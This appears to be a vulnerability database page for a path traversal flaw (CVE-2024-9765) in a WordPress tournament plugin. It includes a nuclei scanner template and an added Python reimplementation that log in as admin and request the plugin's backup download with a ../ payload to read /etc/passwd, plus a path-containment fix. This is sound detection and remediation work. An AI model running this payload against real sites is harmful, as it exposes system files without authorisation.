EKC Tournament Manager WordPress plugin - Path Traversal
CVE-2024-9765
Verified
Description
EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
Severity
Medium
CVSS Score
6.5
Exploit Probability
5%
Affected Product
ekc_tournament_manager
Published Date
February 23, 2026
Template Author
sourabh-sahu
CVE-2024-9765.yaml
id: CVE-2024-9765

info:
  name: EKC Tournament Manager WordPress plugin - Path Traversal
  author: Sourabh-Sahu
  severity: medium
  description: |
    EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
  impact: |
    Logged in admin users can download arbitrary system files, potentially exposing sensitive information.
  remediation: |
    Upgrade to version 2.2.2 or later.
  reference:
    - https://wpscan.com/vulnerability/c86157b0-43f3-4e82-9697-7dd9401b48d6/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-9765
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.04608
    epss-percentile: 0.89373
    cpe: cpe:2.3:a:lukashuser:ekc_tournament_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lukashuser
    product: ekc_tournament_manager
  tags: cve,cve2024,lukashuser,ekc-tournament-manager,authenticated,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
        condition: and
# digest: 4b0a00483046022100d1e818ab9011a0038e5eb7b8ad0990eb4d0f457891a95d4ce9b0cdf4a62cf69602210091e58c3b01b057f01a4abee84080479f79c0af7a9e8b0c824df01885e5179812:922c64590222798bb761d5b6d8e72950
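The template above is a two-request flow: request 1 posts the WordPress login form and only proceeds if a wordpress_logged_in cookie comes back; request 2 hits the plugin's backup download action with a run of ../ segments and looks for the root line of /etc/passwd in the body. The script below is an added example, not the template author's or the plugin vendor's code: it reimplements that flow with the Python standard library so each step can be inspected, separates the response triage into a function that also recognises the "bounced to the login form" case (which a naive check would report as not vulnerable), and adds a path containment check of the kind whose absence the advisory describes. The containment check is an assumption about what a fix looks like, not the plugin's actual 2.2.2 patch; the host example.test, the default traversal depth of 21 and the sample response bodies are constructed for illustration.

```python
"""Added example (not the template's or the vendor's code): the nuclei flow
for CVE-2024-9765 reimplemented step by step, plus a containment check.

run_check() needs a live target you are authorised to test and admin
credentials; the other functions are exercised offline on constructed data.
"""
import http.cookiejar
import posixpath
import re
import urllib.parse
import urllib.request

# Matcher from the template: the root entry of /etc/passwd.
PASSWD_RE = re.compile(r"root:.*:0:0:")

# Constructed sample bodies for offline checks (not captured from a target).
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\n"
SAMPLE_LOGIN_PAGE = '<form name="loginform" id="loginform" action="https://example.test/wp-login.php">'


def traversal_url(base, target="/etc/passwd", depth=21):
    """Build request 2's URL. `depth` only has to exceed the nesting of the
    plugin's backup directory; the template simply uses a generous run of ../."""
    payload = "../" * depth + target.lstrip("/")
    query = urllib.parse.urlencode(
        {"page": "ekc-backup", "action": "download", "backup": payload},
        safe="/",  # send the ../ segments literally, as the template does
    )
    return base.rstrip("/") + "/wp-admin/admin.php?" + query


def classify(body):
    """Triage the download response. A login form means the session cookie was
    not accepted (admin.php bounces unauthenticated users to wp-login.php);
    that is an inconclusive result, not a clean one."""
    if PASSWD_RE.search(body):
        return "vulnerable"
    if "loginform" in body or "wp-login.php" in body:
        return "not-logged-in"
    return "clean"


def run_check(base, username, password):
    """Log in (request 1), then fetch the traversal URL (request 2)."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    form = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": ""}
    ).encode()
    opener.open(base.rstrip("/") + "/wp-login.php", data=form, timeout=15).read()
    # Same condition as the template's internal matcher on request 1.
    if not any(c.name.startswith("wordpress_logged_in") for c in jar):
        return "login-failed"
    with opener.open(traversal_url(base), timeout=15) as resp:
        body = resp.read(65536).decode("utf-8", "replace")
    return classify(body)


def resolve_backup(backup_root, requested):
    """Containment check of the kind a fixed download handler needs (assumed,
    not the vendor's patch): normalise the joined path and refuse anything that
    resolves outside backup_root. Returns the safe path or None."""
    root = posixpath.normpath(backup_root)
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if candidate == root or posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    import sys
    # usage: python check.py https://target.example admin 'password'
    print(run_check(*sys.argv[1:4]))
```

The triage step matters in practice: if the credentials are wrong, the site is behind SSO, or a WAF strips the cookie, request 2 returns the login page and the template's final matcher simply does not fire, so the template reports nothing rather than "inconclusive". The containment function shows why the payload works against a handler that concatenates the parameter onto a directory: the ../ run normalises away the whole prefix, and an absolute path in the parameter replaces it outright, so the check has to be on the resolved path, not on the raw string.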
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2024-9765
CWE ID:
NVD-CWE-noinfo
Remediation Steps
Upgrade to version 2.2.2 or later.